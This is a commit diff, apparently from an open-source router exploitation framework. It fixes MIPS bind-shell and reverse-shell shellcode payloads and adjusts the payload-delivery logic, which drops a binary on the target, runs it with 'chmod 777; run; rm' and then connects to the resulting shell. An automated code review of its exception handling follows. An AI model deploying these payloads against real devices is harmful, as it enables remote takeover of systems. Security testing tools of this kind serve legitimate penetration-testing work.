Commit df6e1b66 by Marcin Bury Committed by GitHub

Payloads fixes (#337)

* Fixing payloads

* Pep fixes
parent 86b8c55e
...@@ -18,10 +18,10 @@ class Exploit(BindTCPPayloadMixin, ArchitectureSpecificPayload): ...@@ -18,10 +18,10 @@ class Exploit(BindTCPPayloadMixin, ArchitectureSpecificPayload):
], ],
} }
architecture = Architectures.MIPSBE architecture = Architectures.MIPSLE
def generate(self): def generate(self):
bind_port = validators.convert_port(self.lport) bind_port = validators.convert_port(self.rport)
return ( return (
"\xe0\xff\xbd\x27" + # addiu sp,sp,-32 "\xe0\xff\xbd\x27" + # addiu sp,sp,-32
"\xfd\xff\x0e\x24" + # li t6,-3 "\xfd\xff\x0e\x24" + # li t6,-3
......
...@@ -18,7 +18,7 @@ class Exploit(ReverseTCPPayloadMixin, ArchitectureSpecificPayload): ...@@ -18,7 +18,7 @@ class Exploit(ReverseTCPPayloadMixin, ArchitectureSpecificPayload):
], ],
} }
architecture = Architectures.MIPSBE architecture = Architectures.MIPSLE
def generate(self): def generate(self):
reverse_ip = validators.convert_ip(self.lhost) reverse_ip = validators.convert_ip(self.lhost)
......
...@@ -283,16 +283,19 @@ class Communication(object): ...@@ -283,16 +283,19 @@ class Communication(object):
if isinstance(item_exec_binary, str): if isinstance(item_exec_binary, str):
try: try:
commands.append(item_exec_binary.format(path)) commands.append(item_exec_binary.format(path))
except ValueError: except (KeyError, ValueError):
commands.append(item_exec_binary) commands.append(item_exec_binary)
elif callable(item_exec_binary): elif callable(item_exec_binary):
commands.append(item_exec_binary(path)) commands.append(item_exec_binary(path))
# instruction to execute generic payload e.g. netcat / awk # instruction to execute generic payload e.g. netcat / awk
elif isinstance(self.exec_binary, str): elif isinstance(self.exec_binary, str):
try:
commands.append(self.exec_binary.format(path))
except (KeyError, ValueError):
commands.append(self.exec_binary) commands.append(self.exec_binary)
# default way of exectuign payload # default way of executing payload
else: else:
exec_binary_str = "chmod 777 {0}; {0}; rm {0}".format(path) exec_binary_str = "chmod 777 {0}; {0}; rm {0}".format(path)
commands.append(exec_binary_str) commands.append(exec_binary_str)
...@@ -314,7 +317,7 @@ class Communication(object): ...@@ -314,7 +317,7 @@ class Communication(object):
for command in commands[:-1]: for command in commands[:-1]:
self.exploit.execute(command) self.exploit.execute(command)
# asynchronous last command to execute binary # asynchronous last command to execute binary & rm binary
thread = threading.Thread(target=self.exploit.execute, args=(commands[-1],)) thread = threading.Thread(target=self.exploit.execute, args=(commands[-1],))
thread.start() thread.start()
...@@ -333,8 +336,12 @@ class Communication(object): ...@@ -333,8 +336,12 @@ class Communication(object):
# execute binary # execute binary
commands = self.build_commands() commands = self.build_commands()
for command in commands: # synchronized commands
thread = threading.Thread(target=self.exploit.execute, args=(command,)) for command in commands[:-1]:
self.exploit.execute(command)
# asynchronous last command to execute binary & rm binary
thread = threading.Thread(target=self.exploit.execute, args=(commands[-1],))
thread.start() thread.start()
# connecting to shell # connecting to shell
......
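Review bot: The new `except (KeyError, ValueError)` around `self.exec_binary.format(path)`, and the matching clause for `item_exec_binary.format(path)`, still lets `IndexError` escape. `str.format` raises `IndexError` when a template references a positional field beyond the single argument (for example `{1}`), so both clauses should read `except (IndexError, KeyError, ValueError):`. The handler also falls back to the unformatted template without any trace, so a malformed template is executed with its braces intact; a log message in the handler would make that visible. In the last hunk, `commands[-1]` raises `IndexError` if `build_commands()` returns an empty list, which may be possible when an entry is neither a string nor a callable. An `if not commands:` guard before the loop would cover that, but the enclosing methods start and end outside the visible hunks, so this should be confirmed against the full file.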